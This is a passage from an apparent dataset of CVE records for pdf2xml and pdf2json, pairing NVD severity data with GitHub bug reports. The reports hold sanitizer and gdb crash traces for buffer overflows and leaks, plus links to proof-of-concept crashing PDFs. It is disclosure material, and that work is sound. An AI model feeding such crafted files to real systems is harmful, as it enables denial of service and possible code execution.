rotate@entry=4612527, useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, sliceX=sliceX@entry=-1, sliceY=-1, sliceW=-1, sliceH=-1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0)
at /home/test/pdf2xml/xpdf/xpdf/Page.cc:360
#6 0x00000000004661af in Page::display (this=<optimized out>, out=out@entry=0x0, hDPI=hDPI@entry=0, vDPI=vDPI@entry=3.9364818670782154e-317, rotate=rotate@entry=4612527,
useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, printing=printing@entry=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/Page.cc:310
#7 0x0000000000466ffb in PDFDoc::displayPage (this=this@entry=0x799328, out=0x0, out@entry=0x79eae0, page=page@entry=1, hDPI=0, hDPI@entry=72, vDPI=3.9364818670782154e-317, vDPI@entry=72,
rotate=4612527, rotate@entry=0, useMediaBox=useMediaBox@entry=1, crop=crop@entry=1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/PDFDoc.cc:386
#8 0x000000000046707e in PDFDoc::displayPages (this=this@entry=0x799328, out=out@entry=0x79eae0, firstPage=firstPage@entry=1, lastPage=lastPage@entry=1, hDPI=hDPI@entry=72, vDPI=vDPI@entry=72,
rotate=rotate@entry=0, useMediaBox=useMediaBox@entry=1, crop=1, printing=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/xpdf/xpdf/PDFDoc.cc:398
#9 0x000000000040d36b in PDFDocXrce::displayPages (this=this@entry=0x799320, out=out@entry=0x79eae0, docrootA=docrootA@entry=0x0, firstPage=1, lastPage=1, hDPI=hDPI@entry=72, vDPI=vDPI@entry=72,
rotate=rotate@entry=0, useMediaBox=1, crop=1, doLinks=0, abortCheckCbk=0x0, abortCheckCbkData=0x0) at /home/test/pdf2xml/src/PDFDocXrce.cc:34
#10 0x0000000000405589 in main (argc=2, argv=<optimized out>) at /home/test/pdf2xml/src/pdftoxml.cc:409
(gdb) x/10i $rip
=> 0x40e29b <XmlOutputDev::restoreState(GfxState*)+171>: mov 0x1fc(%rcx),%esi
0x40e2a1 <XmlOutputDev::restoreState(GfxState*)+177>: mov %esi,0x180(%rbx)
0x40e2a7 <XmlOutputDev::restoreState(GfxState*)+183>: callq 0x402fa0 <_ZdlPv@plt>
0x40e2ac <XmlOutputDev::restoreState(GfxState*)+188>: mov 0x178(%rbx),%rdi
0x40e2b3 <XmlOutputDev::restoreState(GfxState*)+195>: lea -0x8(%rdi),%r8
0x40e2b7 <XmlOutputDev::restoreState(GfxState*)+199>: mov %r8,0x178(%rbx)
0x40e2be <XmlOutputDev::restoreState(GfxState*)+206>: mov -0x8(%rdi),%r9
0x40e2c2 <XmlOutputDev::restoreState(GfxState*)+210>: lea 0x200(%r9),%r10
0x40e2c9 <XmlOutputDev::restoreState(GfxState*)+217>: mov %r9,0x168(%rbx)
0x40e2d0 <XmlOutputDev::restoreState(GfxState*)+224>: add $0x1fc,%r9
(gdb) p/x $rcx
$1 = 0x0
ref:
https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml | NULL-pointer-dereference-TextPage-restoreState | https://api.github.com/repos/kermitt2/pdf2xml/issues/10/comments | 0 | 2020-07-06T01:52:41Z | 2020-07-06T01:52:41Z | https://github.com/kermitt2/pdf2xml/issues/10 | 651,195,343 | 10 | 2,772 |
CVE-2020-23873 | 2021-11-10T22:15:09.223 | pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::dump. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/11"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/11 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 01-Heap-buffer-overflow-TextPage-dump.pdf test.xml
=================================================================
==36659==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004405a at pc 0x7fb7e473d9f5 bp 0x7ffc8a9d8c60 sp 0x7ffc8a9d83f0
WRITE of size 11 at 0x60200004405a thread T0
#0 0x7fb7e473d9f4 in __interceptor_vsprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x619f4)
#1 0x7fb7e473dcc9 in __interceptor_sprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61cc9)
#2 0x419e84 in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:2001
#3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#5 0x45633a in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:394
#6 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
#7 0x45740d in PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/PDFDoc.cc:398
#8 0x407de8 in PDFDocXrce::displayPages(OutputDev*, _xmlNode*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/src/PDFDocXrce.cc:34
#9 0x40943b in main /home/test/pdf2xml_analysis/pdf2xml/src/pdftoxml.cc:409
#10 0x7fb7e321182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#11 0x403d28 in _start (/home/test/pdf2xml_analysis/pdf2xml/pdf2xml+0x403d28)
0x60200004405a is located 0 bytes to the right of 10-byte region [0x602000044050,0x60200004405a)
allocated by thread T0 here:
#0 0x7fb7e4774602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x416b22 in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1652
#2 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#3 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#4 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c04800007b0: fa fa 00 fa fa fa 00 02 fa fa 00 fa fa fa 00 00
0x0c04800007c0: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 00
0x0c04800007d0: fa fa fd fa fa fa fd fd fa fa 06 fa fa fa 03 fa
0x0c04800007e0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 06 fa
0x0c04800007f0: fa fa 04 fa fa fa fd fd fa fa fd fa fa fa fd fd
=>0x0c0480000800: fa fa 06 fa fa fa 05 fa fa fa 00[02]fa fa 00 fa
0x0c0480000810: fa fa fd fa fa fa 00 fa fa fa fd fa fa fa fd fa
0x0c0480000820: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 05 fa
0x0c0480000830: fa fa 07 fa fa fa 00 fa fa fa 02 fa fa fa 00 fa
0x0c0480000840: fa fa 02 fa fa fa 02 fa fa fa 00 fa fa fa 02 fa
0x0c0480000850: fa fa 00 fa fa fa 02 fa fa fa 02 fa fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==36659==ABORTING
[01-Heap-buffer-overflow-TextPage-dump.pdf](https://github.com/kermitt2/pdf2xml/files/4876401/01-Heap-buffer-overflow-TextPage-dump.pdf)
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml | Heap-buffer-overflow-TextPage-dump | https://api.github.com/repos/kermitt2/pdf2xml/issues/11/comments | 0 | 2020-07-06T01:58:25Z | 2020-07-06T01:58:52Z | https://github.com/kermitt2/pdf2xml/issues/11 | 651,196,717 | 11 | 2,773 |
CVE-2020-23874 | 2021-11-10T22:15:09.370 | pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::addAttributsNode. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description"
],
"url": "https://cwe.mitre.org/data/definitions/122.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/12"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/12 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 02-Heap-buffer-overflow-addAttributsNode.pdf test.xml
=================================================================
==57105==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004999a at pc 0x7f0869e219f5 bp 0x7fffaa6b3610 sp 0x7fffaa6b2da0
WRITE of size 12 at 0x60200004999a thread T0
#0 0x7f0869e219f4 in __interceptor_vsprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x619f4)
#1 0x7f0869e21cc9 in __interceptor_sprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61cc9)
#2 0x414e3d in TextPage::addAttributsNode(_xmlNode*, TextWord*, double&, double&, double&, double&, double&, double&) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1423
#3 0x417c7c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1815
#4 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#5 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#6 0x45633a in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:394
#7 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
#8 0x45740d in PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/PDFDoc.cc:398
#9 0x407de8 in PDFDocXrce::displayPages(OutputDev*, _xmlNode*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/src/PDFDocXrce.cc:34
#10 0x40943b in main /home/test/pdf2xml_analysis/pdf2xml/src/pdftoxml.cc:409
#11 0x7f08688f582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#12 0x403d28 in _start (/home/test/pdf2xml_analysis/pdf2xml/pdf2xml+0x403d28)
0x60200004999a is located 0 bytes to the right of 10-byte region [0x602000049990,0x60200004999a)
allocated by thread T0 here:
#0 0x7f0869e58602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4148c4 in TextPage::addAttributsNode(_xmlNode*, TextWord*, double&, double&, double&, double&, double&, double&) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1389
#2 0x417c7c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1815
#3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#5 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c04800012e0: fa fa 00 fa fa fa 00 03 fa fa fd fa fa fa fd fd
0x0c04800012f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c0480001300: fa fa 00 fa fa fa 00 00 fa fa 02 fa fa fa 00 02
0x0c0480001310: fa fa 03 fa fa fa 07 fa fa fa 03 fa fa fa 05 fa
0x0c0480001320: fa fa 04 fa fa fa 06 fa fa fa 04 fa fa fa 00 01
=>0x0c0480001330: fa fa 00[02]fa fa 00 fa fa fa 00 02 fa fa 00 fa
0x0c0480001340: fa fa 00 00 fa fa 00 fa fa fa fd fa fa fa 00 fa
0x0c0480001350: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 06 fa
0x0c0480001360: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c0480001370: fa fa 06 fa fa fa 04 fa fa fa fd fd fa fa fd fa
0x0c0480001380: fa fa fd fd fa fa 06 fa fa fa 05 fa fa fa 00 02
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==57105==ABORTING
[02-Heap-buffer-overflow-addAttributsNode.pdf](https://github.com/kermitt2/pdf2xml/files/4876407/02-Heap-buffer-overflow-addAttributsNode.pdf)
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml | Heap-buffer-overflow-addAttributsNode | https://api.github.com/repos/kermitt2/pdf2xml/issues/12/comments | 0 | 2020-07-06T02:02:32Z | 2020-07-06T02:02:32Z | https://github.com/kermitt2/pdf2xml/issues/12 | 651,197,692 | 12 | 2,774 |
CVE-2020-23876 | 2021-11-10T22:15:09.447 | pdf2xml v2.0 was discovered to contain a memory leak in the function TextPage::testLinkedText. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/14"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/kermitt2/pdf2xml/issues/14 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ ./pdf2xml 04-Memory leaks-TextPage-testLinkedText.pdf test.xml
=================================================================
==82085==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 99000 byte(s) in 99 object(s) allocated from:
#0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7f1553d2f735 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x2e735)
Direct leak of 4850 byte(s) in 97 object(s) allocated from:
#0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4156a9 in TextPage::testLinkedText(_xmlNode*, double, double, double, double) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1473
#2 0x41773d in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1764
#3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#5 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
Direct leak of 3924 byte(s) in 97 object(s) allocated from:
#0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x417a6c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1800
#2 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155
#3 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591
#4 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310
Direct leak of 3316 byte(s) in 227 object(s) allocated from:
#0 0x7f15545e330f in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x6230f)
#1 0x40a476 in TextWord::TextWord(GfxState*, int, int, int, int, double, double, int, TextFontInfo*, double, int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:212
#2 0x4125fc in TextPage::beginWord(GfxState*, double, double) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1160
#3 0x4128c9 in TextPage::addChar(GfxState*, double, double, double, double, unsigned int, int, unsigned int*, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1178
#4 0x429048 in XmlOutputDev::drawChar(GfxState*, double, double, double, double, double, double, unsigned int, int, unsigned int*, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4172
#5 0x4935b1 in Gfx::doShowText(GString*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:3646
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml
[04-Memory leaks-TextPage-testLinkedText.pdf](https://github.com/kermitt2/pdf2xml/files/4876577/04-Memory.leaks-TextPage-testLinkedText.pdf)
| Memory-leaks-TextPage-testLinkedText | https://api.github.com/repos/kermitt2/pdf2xml/issues/14/comments | 0 | 2020-07-06T03:02:05Z | 2020-07-06T03:02:05Z | https://github.com/kermitt2/pdf2xml/issues/14 | 651,213,773 | 14 | 2,775 |
CVE-2020-23877 | 2021-11-10T22:15:09.567 | pdf2xml v2.0 was discovered to contain a stack buffer overflow in the component getObjectStream. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kermitt2/pdf2xml/issues/15"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/kermitt2/pdf2xml/issues/15 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kermitt2",
"pdf2xml"
] | $ gdb ./pdf2xml
(gdb) r 05-Stack-buffer-overflow-XRef-getObjectStream.pdf test.xml
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Syntax Error (593163): Dictionary key must be a name object
Syntax Error (593170): Dictionary key must be a name object
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff6e8c80b in ?? () from /usr/lib/x86_64-linux-gnu/libasan.so.2
(gdb) x/5i $rip
=> 0x7ffff6e8c80b: mov %ecx,0x8(%rsp)
0x7ffff6e8c80f: mov %r8d,0x10(%rsp)
0x7ffff6e8c814: mov (%rax),%eax
0x7ffff6e8c816: test %eax,%eax
0x7ffff6e8c818: je 0x7ffff6e8d0a0
ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml
[05-Stack-buffer-overflow-XRef-getObjectStream.pdf](https://github.com/kermitt2/pdf2xml/files/4876586/05-Stack-buffer-overflow-XRef-getObjectStream.pdf)
| Stack-buffer-overflow-XRef-getObjectStream | https://api.github.com/repos/kermitt2/pdf2xml/issues/15/comments | 0 | 2020-07-06T03:05:26Z | 2020-07-06T03:05:26Z | https://github.com/kermitt2/pdf2xml/issues/15 | 651,214,682 | 15 | 2,776 |
CVE-2020-23878 | 2021-11-10T22:15:09.687 | pdf2json v0.71 was discovered to contain a stack buffer overflow in the component XRef::fetch. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
